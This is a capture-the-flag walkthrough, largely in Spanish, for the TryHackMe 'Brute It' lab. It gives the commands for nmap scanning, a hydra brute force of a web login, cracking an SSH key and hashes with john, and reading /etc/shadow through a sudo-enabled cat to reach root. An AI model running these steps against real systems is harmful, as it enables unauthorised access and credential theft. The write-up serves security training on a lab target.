Brute It - TryHackMe
Brute It a beginner-friendly challenge by TryHackMe. It is separated into three tasks reconnaissance, getting a shell, and privilege escalation with questions along the way to guide you throughout the engagement. It is a bit more hand-holding but was a fun challenge nonetheless. This box requires you to brute force, crack hashes, and escalate privileges to root.
Summary
- IP: 10.10.220.132
- Ports: 22,80
- OS: Linux (Ubuntu)
- Services & Applications:
- 22 -> OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
- 80 -> Apache httpd 2.4.29
Recon
- Escaneo básico de puertos:
$sudo nmap -p- -sS --open --min-rate 5000 -vvv -n -Pn 10.10.220.132 -oG allPorts
- Escaneo profundo de puertos encontrados:
$sudo nmap -p22,80 -sCV 10.10.129.26 -oN targeted
- Escaneo básico de directorios web:
$nmap --script http-enum -p80 10.10.220.132 -oN webSCan
- Encontramos el directorio “/admin” lo examinamos y vemos una página de logeo, analizando el código fuente encontramos el usuario “admin”, hacemos ataque de fuerza bruta al login usando el usuario encontrado:
$hydra -l admin -P /home/dante/SecLists/Passwords/Leaked-Databases/rockyou.txt 10.10.220.132 http-post-form "/admin/index.php:user=^USER^&pass=^PASS^:Username or password invalid"
- Encontramos la contraseña para el usuario “admin” accedemos y vemos un mensaje que nos redirige a un “id_rsa” el cual contiene la clave privada SSH encriptada del usuario “john”, la crackeamos con john:
$nano id_rsa
$chmod 600 id_rsa
$/usr/share/john/ssh2john.py id_rsa > id_rsa.txt
$john -w:/home/dante/SecLists/Passwords/Leaked-Databases/rockyou.txt id_rsa.txt
- Ecnontramos la contraseña para el usuario “john”, accedemos via SSH usando el archivo rsa:
$ssh -i id_rsa jhon@10.10.220.132
- Encontramos la primera flag.
ESCALANDO PRIVILEGIOS:
- Buscamos binarios con permisos de ejecutar como root sin contraseña:
$sudo -l
- Encontramos el binario “cat”, aprovechamos para leer el archivo “/etc/shadow”:
$sudo cat /etc/shadow
- Copiar en un archivo el contenido del archivo shadows e intentar crackear contraseñas de usuarios con john:
nano shadow
john shadow
- Encontramos la contraseña de root, accedemos y encontramos la última flag.